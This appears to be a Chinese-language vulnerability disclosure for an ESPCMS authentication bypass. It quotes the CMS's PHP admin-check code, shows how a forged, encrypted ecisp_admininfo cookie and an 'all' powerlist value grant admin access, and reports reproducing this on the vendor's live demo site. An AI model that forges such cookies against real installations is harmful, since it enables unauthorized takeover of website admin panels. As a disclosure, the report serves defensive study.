### 简要描述:
ESPCMS 权限限定绕过直接登录后台
仅测试了 最新版本
然后demo测试进去看了一眼,别的什么也没做。
### 详细说明:
先看下 后台验证的代码
```
function softbase($admin_purview = false) {
header("Content-Type: text/html; charset=utf-8");
$this->dbmysql();
$this->commandinc();
$this->systemfile();
$this->cachedb();
if ($admin_purview) {
$this->admin_purview();
$this->sitelng = $this->getlng();
$action = $this->fun->accept('action', 'R');
if (in_array($action, $this->esp_powerlist) && !in_array('all', $this->esp_powerlist)) {
exit('Permissions errors');
}
}
if ($this->CON['is_gzip'] == 1 && !function_exists('ob_gzhandler')) {
ob_start('ob_gzhandler');
} else {
ob_start();
}
if ($runpage && $this->CON['is_close']) {
exit($this->CON['close_content']);
}
if (!admin_FROM) {
include admin_ROOT . adminfile . '/include/admin_language_' . db_lan . '.php';
$this->lng = $ST;
unset($ST);
} else {
$lngpack = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
if ($this->creat_lanpack($lngpack)) {
include admin_ROOT . 'datacache/' . $lngpack . '_pack.php';
}
$this->lng = $LANPACK;
$runpage = true;
}
}
```
调用了下面的函数。
$this->admin_purview();
然后继续查看代码
```
function admin_purview() {
if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') {
$ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C');
$esp_powerlist = $this->fun->accept('esp_powerlist', 'C');
$gettype = false;
} else {
$ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C');
$esp_powerlist = $this->fun->accept('esp_powerlist', 'C');
$gettype = true;
}
$arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE', db_pscode));
$this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'DECODE', db_pscode));
list($esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $esp_powerid, $esp_inputclassid, $this->esp_softurl) = $arr_purview;
$this->esp_adminuserid = intval($esp_adminuserid);
$this->esp_inputclassid = intval($esp_inputclassid);
$this->esp_powerid = intval($esp_powerid);
if ($gettype) {
if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) {
$condition = 0;
} else {
$condition = 1;
}
} else {
if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_ClassURL) != $this->esp_softurl) {
$condition = 0;
} else {
$condition = 1;
}
}
if ($condition == 0) {
if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') {
header('location: index.php?archive=adminuser&action=login');
exit();
}
} else {
if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == '' && $this->fun->accept('action', 'R') == '') {
header('location: index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter');
exit();
}
}
}
```
然后重点验证的是下面的代码
```
if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl)
```
$this->esp_username和$this->esp_adminuserid 可以在cookies中伪造。
而后面的 两个常量如下
```
admin_AGENT
define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']);
admin_ClassURL
define('admin_ClassURL', 'http://' . $_SERVER['HTTP_HOST'] . substr($_SERVER['PHP_SELF'], 0, strrpos($_SERVER['PHP_SELF'], '/')) . '/');
```
可见,可进行伪造。
再来说下查看key
直接可以看索马里大牛的http://wooyun.org/bugs/wooyun-2010-062528
这里就不多说了。
来张截图进行下示例。
[<img src="https://images.seebug.org/upload/201410/042018030326d7abfec8af3402fae0eb85796811.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/042018030326d7abfec8af3402fae0eb85796811.png)
出来之后 然后挨个进行 加密解密测试。
最终可以得出key
### 漏洞证明:
下面我们开始伪造
cookies中ecisp_admininfo的加密前值如下。
```
1|admin|md5(password)|md5(admin_AGENT)|1|1|md5(admin_ClassURL)
```
下面我拿测试用的agent和classurl进行演示
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
加密之后
efdd8e8dfc89de8875254f2e96f2eeb2
http://192.168.1.107/adminsoft
加密之后
962c6fbd63e97c6d6db74449a6bef874
password不进行验证,随便输入个wooyun
加密之后
fbb204a4061ffbd41284a84c258c1bfb
然后填充进去
```
1|admin|fbb204a4061ffbd41284a84c258c1bfb|efdd8e8dfc89de8875254f2e96f2eeb2|1|1|962c6fbd63e97c6d6db74449a6bef874
```
加密
```
Zq-XmKLPoa3LlJWUYpqVbWecaJybxspoZWRtZ5dsacllZp2VZMSYyLCencqbbpqcypqXam6Xm2xtnWhjmmaZlJefap9py5yYZ-CXsGWubmlol2vMlZWbZZibaclqnW3KmW1pmJptlWiXmJxsbJo
```
然后我们可以得出cookies的设定值
ecisp_admininfo 设定为
Zq-XmKLPoa3LlJWUYpqVbWecaJybxspoZWRtZ5dsacllZp2VZMSYyLCencqbbpqcypqXam6Xm2xtnWhjmmaZlJefap9py5yYZ-CXsGWubmlol2vMlZWbZZibaclqnW3KmW1pmJptlWiXmJxsbJo
esp_powerlist 设定为 all 的加密lp-i
managementloglistpgid 设定为0
managementmangerlistpgid 设定为0
开始进行伪造管理员
我们先打开
```
http://192.168.1.107/adminsoft/index.php
```
这个页面 然后开始填充cookies
[<img src="https://images.seebug.org/upload/201410/0420231659b0a11c6eaddcc9f2314e84bfc01895.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/0420231659b0a11c6eaddcc9f2314e84bfc01895.png)
然后访问下面的url
```
http://192.168.1.107/adminsoft/index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter
```
[<img src="https://images.seebug.org/upload/201410/04202343efcb5300ddcde3e099d432d4c8595d11.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/04202343efcb5300ddcde3e099d432d4c8595d11.png)
好了下面我们来说下demo的
先注册个帐号。
[<img src="https://images.seebug.org/upload/201410/04202410245b45190f2094bb7412fb3996a93782.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/04202410245b45190f2094bb7412fb3996a93782.png)
然后 翻来覆去 获得key
b16dd02887<马赛克>eabab<马赛克>
然后我们访问
```
http://demo.ecisp.cn/adminsoft
```
再生成cookies
访问
```
http://demo.ecisp.cn/adminsoft/index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter
```
[<img src="https://images.seebug.org/upload/201410/042026237ad4bc7f8a35d32a51df7051f01d40dd.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/042026237ad4bc7f8a35d32a51df7051f01d40dd.png)
京公网安备 11010502034610号
暂无评论